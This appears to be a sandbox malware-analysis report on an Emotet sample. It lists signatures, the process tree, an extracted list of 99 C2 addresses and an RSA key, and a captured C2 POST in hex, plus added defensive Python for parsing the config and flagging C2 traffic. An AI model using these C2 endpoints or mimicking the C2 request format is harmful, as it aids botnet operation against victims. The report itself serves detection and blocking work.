
Analysis Report TOfDTHKl.exe

Overview

General Information

Sample Name: TOfDTHKl.exe
Analysis ID: 289508
MD5: f19a285b3a805702cee7a4fd579604a8
SHA1: 3700dd2380fdec532f55d0568f274be0448d2780
SHA256: aee0d860e14af14cfceed5e04e957560f3b447d30c4a364598681b8b9aad5fa9

Detection

Emotet
Score: 76 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • svchost.exe (PID: 6596 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TOfDTHKl.exe (PID: 6616 cmdline: 'C:\Users\user\Desktop\TOfDTHKl.exe' MD5: F19A285B3A805702CEE7A4FD579604A8)
    • unregmp2.exe (PID: 6752 cmdline: C:\Windows\SysWOW64\Faultrep\unregmp2.exe MD5: F19A285B3A805702CEE7A4FD579604A8)
  • svchost.exe (PID: 6648 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4376 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6260 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6496 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6552 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5280 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5476 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5664 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2244 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6412 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7144 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

The extractor output listed every C2 entry twice. The 99 unique host:port pairs and the RSA public key (base64 DER SubjectPublicKeyInfo; it decodes to a 768-bit modulus with public exponent 65537) are:

{"C2 list": [
"174.106.122.139:80", "159.203.116.47:8080", "173.249.6.108:443", "104.236.246.93:8080", "174.45.13.118:80", "137.59.187.107:8080",
"94.200.114.161:80", "37.187.72.193:8080", "67.10.155.92:80", "121.124.124.40:7080", "24.43.99.75:80", "75.139.38.211:80",
"109.74.5.95:8080", "137.119.36.33:80", "74.134.41.124:80", "66.65.136.14:80", "94.1.108.190:443", "181.169.235.7:80",
"79.137.83.50:443", "104.131.44.150:8080", "121.7.127.163:80", "96.249.236.156:443", "120.150.60.189:80", "134.209.36.254:8080",
"110.145.77.103:80", "118.83.154.64:443", "71.72.196.159:80", "50.91.114.38:80", "62.75.141.82:80", "157.245.99.39:8080",
"140.186.212.146:80", "168.235.67.138:7080", "104.131.11.150:443", "78.24.219.147:8080", "46.105.131.79:8080", "104.251.33.179:80",
"24.43.32.186:80", "200.114.213.233:8080", "153.137.36.142:80", "85.96.199.93:80", "94.23.237.171:443", "5.39.91.110:7080",
"85.152.162.105:80", "162.241.242.173:8080", "213.196.135.145:80", "139.99.158.11:443", "194.187.133.160:443", "78.187.156.31:80",
"1.221.254.82:80", "124.41.215.226:80", "139.130.242.43:80", "209.141.54.221:8080", "87.106.136.232:8080", "83.169.36.251:8080",
"195.7.12.8:80", "185.94.252.104:443", "95.213.236.64:8080", "42.200.107.142:80", "203.153.216.189:7080", "68.188.112.97:80",
"5.196.74.210:8080", "87.106.139.101:8080", "104.32.141.43:80", "94.124.59.22:8080", "74.219.172.26:80", "108.46.29.236:80",
"93.147.212.206:80", "172.104.97.173:8080", "190.240.194.77:443", "103.86.49.11:8080", "74.208.45.104:8080", "82.80.155.43:80",
"61.19.246.238:443", "139.162.108.71:8080", "121.7.31.214:80", "188.219.31.12:80", "37.139.21.175:8080", "181.169.34.190:80",
"219.74.18.66:443", "123.176.25.234:80", "216.139.123.119:80", "79.98.24.39:8080", "62.30.7.67:443", "139.162.60.124:8080",
"176.111.60.55:8080", "91.211.88.52:7080", "172.91.208.86:80", "139.59.60.244:8080", "107.5.122.110:80", "50.35.17.13:80",
"97.82.79.83:80", "68.252.26.78:80", "110.142.236.207:80", "47.144.21.12:443", "24.137.76.62:80", "220.245.198.194:80",
"74.120.55.163:80", "24.179.13.119:80", "113.61.66.94:80"],
"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

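The extracted configuration is what an analyst turns into blocklists and key tracking. The following Python script is an added worked example, not part of the Joe Sandbox report: it deduplicates the C2 list, counts listeners per port, and walks the DER of the RSA public key by hand to confirm modulus size and exponent. SAMPLE_CONFIG is a constructed subset of the configuration above (the first five C2 entries, repeated once as the extractor output repeated them, plus the full key); the helper names are this example's own.

```python
"""Parse an extracted Emotet configuration: dedupe the C2 list, check the RSA key.

Added example for this report (not Joe Sandbox code). SAMPLE_CONFIG is a
constructed subset of the configuration above: the first five C2 entries,
repeated once as the extractor output repeated them, plus the full RSA key.
"""
import base64
import json
from collections import Counter

SAMPLE_CONFIG = r'''{"C2 list": ["174.106.122.139:80", "159.203.116.47:8080",
  "173.249.6.108:443", "104.236.246.93:8080", "121.124.124.40:7080",
  "174.106.122.139:80", "159.203.116.47:8080", "173.249.6.108:443",
  "104.236.246.93:8080", "121.124.124.40:7080"],
 "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}'''

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1


def load_config(text):
    return json.loads(text)


def unique_c2s(config):
    """C2 endpoints in first-seen order with duplicates dropped."""
    seen, out = set(), []
    for entry in config["C2 list"]:
        if entry not in seen:
            seen.add(entry)
            out.append(entry)
    return out


def port_histogram(c2s):
    """How many C2 endpoints listen on each port (useful when writing egress rules)."""
    return Counter(int(entry.rsplit(":", 1)[1]) for entry in c2s)


def _der_tlv(buf, pos):
    """Read one DER tag-length-value at buf[pos]; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                        # long-form length: low bits give the byte count
        count = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + count], "big"), pos + count
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_spki(b64):
    """Decode a base64 SubjectPublicKeyInfo; return (modulus_bits, public_exponent).

    Layout: SEQUENCE { SEQUENCE { OID rsaEncryption, NULL },
                       BIT STRING { SEQUENCE { INTEGER n, INTEGER e } } }
    """
    der = base64.b64decode("".join(b64.split()))      # drop the embedded newlines
    tag, spki, _ = _der_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("not a SEQUENCE")
    tag, algid, pos = _der_tlv(spki, 0)
    oid_tag, oid, _ = _der_tlv(algid, 0)
    if tag != 0x30 or oid_tag != 0x06 or oid != RSA_ENCRYPTION_OID:
        raise ValueError("algorithm is not rsaEncryption")
    tag, bitstr, _ = _der_tlv(spki, pos)
    if tag != 0x03 or bitstr[0] != 0:                 # first octet = number of unused bits
        raise ValueError("malformed BIT STRING")
    _, rsapub, _ = _der_tlv(bitstr, 1)
    tag_n, n, pos = _der_tlv(rsapub, 0)
    tag_e, e, _ = _der_tlv(rsapub, pos)
    if tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("RSAPublicKey integers missing")
    return int.from_bytes(n, "big").bit_length(), int.from_bytes(e, "big")


def main():
    cfg = load_config(SAMPLE_CONFIG)
    c2s = unique_c2s(cfg)
    print(f"{len(c2s)} unique C2 endpoints; ports: {dict(port_histogram(c2s))}")
    bits, exponent = parse_rsa_spki(cfg["RSA Public Key"])
    print(f"RSA modulus: {bits} bits, public exponent {exponent}")


if __name__ == "__main__":
    main()
```

Run against the full list above, `unique_c2s` returns 99 endpoints, and `parse_rsa_spki` reports a 768-bit modulus with exponent 65537; a key of a different size or algorithm raises instead of being silently accepted, which is the check you want before tracking a key across samples.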
Yara Overview

Memory Dumps

Source                                                               Rule                Description           Author
00000003.00000002.471301140.00000000004E4000.00000004.00000001.sdmp  JoeSecurity_Emotet  Yara detected Emotet  Joe Security
00000001.00000002.205426555.0000000002081000.00000020.00000001.sdmp  JoeSecurity_Emotet  Yara detected Emotet  Joe Security
00000001.00000002.205338355.0000000002050000.00000040.00000001.sdmp  JoeSecurity_Emotet  Yara detected Emotet  Joe Security
00000001.00000002.205378378.0000000002064000.00000004.00000001.sdmp  JoeSecurity_Emotet  Yara detected Emotet  Joe Security
00000003.00000002.471359419.0000000000511000.00000020.00000001.sdmp  JoeSecurity_Emotet  Yara detected Emotet  Joe Security
(1 further entry not shown)

Unpacked PEs

Source                             Rule                Description           Author
3.2.unregmp2.exe.510000.1.unpack   JoeSecurity_Emotet  Yara detected Emotet  Joe Security
1.2.TOfDTHKl.exe.2080000.1.unpack  JoeSecurity_Emotet  Yara detected Emotet  Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000002.471301140.00000000004E4000.00000004.00000001.sdmp  Malware Configuration Extractor: Emotet (C2 list and RSA public key as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: TOfDTHKl.exe  VirusTotal: Detection: 10%
Source: TOfDTHKl.exe  ReversingLabs: Detection: 12%

Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\TOfDTHKl.exe  Code function: 1_2_02083810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose  1_2_02083810

IP address seen in connection with other malware
Source: Joe Sandbox View  IP Address: 174.106.122.139

Internet Provider seen in connection with other malware
Source: Joe Sandbox View  ASN Name: TWC-11426-CAROLINASUS

Uses a known web browser user agent for HTTP communication
Source: global traffic  HTTP traffic detected:
POST /WkVTB/IyTRQV6r5gRVh0eW8/Pvtg4MJreF6izA88J/w19T8y6pEQH26/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: 174.106.122.139/WkVTB/IyTRQV6r5gRVh0eW8/Pvtg4MJreF6izA88J/w19T8y6pEQH26/
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------AkDekGTz9
Host: 174.106.122.139
Content-Length: 4596
Cache-Control: no-cache
Note the Referer: it carries no scheme and is just Host plus the request path, and the Host is a bare IP that was reached without any DNS lookup (see the TCP entries below). A real Firefox form submission would send an absolute Referer URL.
Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 6b 44 65 6b 47 54 7a 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 65 61 71 7a 62 6f 6f 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 75 70 79 74 64 75 64 66 71 6d 71 69 6a 72 62 63 69 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 59 0c c1 da e1 b9 e2 51 b9 05 1a 95 93 19 1b 55 f4 11 9c 31 7b ea 07 1d 6c 27 9c 46 aa ac 2a 4a b9 a8 fa 58 41 de b6 0e 5f 43 c2 ee 94 62 28 4a 8d f2 3c da 95 25 41 94 72 4d 38 d5 cf 53 22 fd c7 6b 58 4e 93 87 78 a6 55 e7 88 0a ed 05 72 a7 67 9a 7d 3f 77 f6 d8 14 96 66 4c 22 71 66 ca 2e 4f b2 99 9f f4 92 cc f4 d2 87 1c 23 62 f1 e3 82 b0 e1 8f 78 4c ff 8c 15 0a c3 7d 16 5c 8e 57 b8 b5 e1 58 8f 1e 72 27 c3 eb f3 ce db 83 36 47 26 df f0 25 b4 67 25 3f 0c 1d 0d 21 e3 ee b4 0e fa 7d be 1e b2 29 e2 54 aa cc ca 9a 44 77 78 f8 bc 2c 52 72 04 19 ce 14 e5 47 2a 0d e0 cb 79 93 e2 5a 11 df 05 14 9d 1c 5d 7e cc ae 5a 71 a1 b7 26 ee 25 9f b7 bf 94 36 83 0e 45 03 bc c8 96 40 c4 68 cc 11 38 77 f6 93 e0 41 cc 2a 11 30 83 da 77 76 14 ed 03 59 3b c6 e4 f4 83 95 6d 8e 5e d8 36 e9 88 7e 37 05 f8 41 e1 a2 a3 47 52 86 88 1f fc 20 38 ff fd 49 66 0c 35 c3 81 06 95 6f dc 72 3a d0 02 e3 78 3a b6 f6 d0 a9 28 52 18 29 f2 98 75 42 a2 7e 59 83 00 18 a5 e4 0a d0 55 05 cf 1b c4 cd 34 ac 5a ea a3 82 00 59 b8 ee b0 fd 93 a4 c1 68 00 ed 77 5a 06 3a e8 6e db 38 c1 d5 6e e1 a0 03 ad 1a 0d e0 c4 82 31 7b ff ce 84 9f 9c 51 6b fe 36 ec 28 72 33 5e 23 0f 6f a1 2a 68 00 f1 28 97 b1 df 6c 05 0e c0 25 04 4d 75 4a cc 70 c0 3d 92 cb e1 a9 13 11 70 ed 69 d7 6a 3b ef 12 bd d8 57 91 17 58 91 01 97 d4 4c 04 e0 19 c0 e7 14 14 15 1a 02 68 43 8b ed d8 cf c2 d0 94 4a 3d 89 cb 71 03 89 48 63 87 c8 fa d6 52 a0 71 13 2f cf f1 d7 fd 5f 54 e8 bd 17 57 fb 94 aa c0 e6 84 3a 08 49 c3 4f b7 e6 67 2c 89 17 49 91 5a fe 10 1a a5 12 0c 2e 54 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 6b 44 65 6b 47 54 7a 39 2d 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii (decoded; CRLF shown as line breaks, encrypted payload omitted):
-----------AkDekGTz9
Content-Disposition: form-data; name="eaqzboo"; filename="upytdudfqmqijrbci"
Content-Type: application/octet-stream

<encrypted payload, begins 59 0c c1 da ...>
-----------AkDekGTz9--
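The request above is worth dissecting because the C2 traffic is dressed up as a Firefox form upload. The script below is an added example, not sandbox output: it extracts the form-data part from the multipart body and applies a handful of heuristics that separate this POST from a genuine browser upload. The request line, headers and the start of the body are copied from the capture; SAMPLE_BODY is a constructed sample truncated after sixteen payload bytes and closed with the close delimiter and zero padding the capture shows. The indicator names, and the assumption that Firefox generates boundaries of 27 dashes followed by digits, are this example's own.

```python
"""Dissect the Emotet C2 POST captured above and flag what makes it look like C2.

Added example for this report (not Joe Sandbox code). Request line, headers and
the start of the multipart body are copied from the capture on this page; the
body is a constructed sample, cut after the first 16 payload bytes and closed
with the close delimiter and zero padding the capture shows. The indicator
heuristics are this example's own assumptions, not sandbox signatures.
"""
import re

METHOD = "POST"
PATH = "/WkVTB/IyTRQV6r5gRVh0eW8/Pvtg4MJreF6izA88J/w19T8y6pEQH26/"
HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "DNT": "1",
    "Connection": "keep-alive",
    "Referer": "174.106.122.139/WkVTB/IyTRQV6r5gRVh0eW8/Pvtg4MJreF6izA88J/w19T8y6pEQH26/",
    "Upgrade-Insecure-Requests": "1",
    "Content-Type": "multipart/form-data; boundary=---------AkDekGTz9",
    "Host": "174.106.122.139",
    "Content-Length": "4596",
    "Cache-Control": "no-cache",
}
SAMPLE_BODY = (
    b"\r\n-----------AkDekGTz9\r\n"
    b'Content-Disposition: form-data; name="eaqzboo"; filename="upytdudfqmqijrbci"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    + bytes.fromhex("590cc1dae1b9e251b9051a9593191b55")  # first 16 bytes of the encrypted payload
    + b"\r\n-----------AkDekGTz9--"
    + b"\x00" * 16                                       # zero padding after the close delimiter
)


def boundary_from_content_type(content_type):
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    return m.group(2) if m else None


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into parts (name, filename, content_type, data)."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:          # bytes before the first delimiter are preamble
        if chunk.startswith(b"--"):              # close delimiter: the rest is epilogue or padding
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):               # the CRLF before the next delimiter is syntax, not data
            data = data[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        params = dict(re.findall(r'(\w+)="([^"]*)"', headers.get("content-disposition", "")))
        parts.append({"name": params.get("name"), "filename": params.get("filename"),
                      "content_type": headers.get("content-type"), "data": data})
    return parts


def c2_indicators(method, path, headers):
    """Heuristics (this example's assumptions) that separate this POST from a browser upload."""
    found = []
    host, referer = headers.get("Host", ""), headers.get("Referer", "")
    ctype = headers.get("Content-Type", "")
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        found.append("host-is-bare-ipv4")           # pairs with the 'TCP without DNS query' entries
    if referer and not referer.lower().startswith(("http://", "https://")):
        found.append("referer-lacks-scheme")        # browsers send an absolute Referer URL
    if referer == host + path:
        found.append("referer-equals-request-target")
    if re.fullmatch(r"/(?:[A-Za-z0-9]+/)+", path):
        found.append("path-is-random-alnum-segments")
    boundary = boundary_from_content_type(ctype) or ""
    if (method == "POST" and ctype.startswith("multipart/form-data")
            and "Firefox" in headers.get("User-Agent", "")
            and not re.fullmatch(r"-{27}\d+", boundary)):
        found.append("boundary-not-firefox-style")  # assumption: Firefox uses 27 dashes + digits
    return found


def main():
    boundary = boundary_from_content_type(HEADERS["Content-Type"])
    for part in parse_multipart(SAMPLE_BODY, boundary):
        print(f"field={part['name']} filename={part['filename']} "
              f"type={part['content_type']} payload={part['data'][:8].hex()}...")
    print("indicators:", ", ".join(c2_indicators(METHOD, PATH, HEADERS)))


if __name__ == "__main__":
    main()
```

Because `parse_multipart` stops at the close delimiter, the zero padding the capture shows after `-----------AkDekGTz9--` never leaks into the payload; the extracted field and file names (`eaqzboo`, `upytdudfqmqijrbci`) are random per request, so the useful detection signal is the combination of indicators rather than any one string.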

TCP traffic detected without corresponding DNS query
Source: unknown  TCP traffic detected without corresponding DNS query: 174.106.122.139 (listed 8 times)

Strings found in binary or memory (Microsoft Store product metadata in a svchost.exe process, not in the sample)
Source: svchost.exe, 00000012.00000003.360584543.00000269669D9000.00000004.00000001.sdmp  String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-09-22T19:12:55.3225945Z||.||5cf543b6-b372-4e6c-b8a0-d33819d40a21||1152921505691572521||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000012.00000003.361191391.0000026966928000.00000004.00000001.sdmp  String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.facebook.com (Facebook), www.twitter.com (Twitter)
                Source: svchost.exe, 00000012.00000003.356055531.0000026966965000.00000004.00000001.sdmpString found in binary or memory: t enough. \r\n\r\nSHARE WITH FRIENDS \r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity. \r\n\r\nPrivacy Policy: https://www.facebook.com/about/privacy/ \r\nLEARN MORE at: http://messenger.com","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E0845
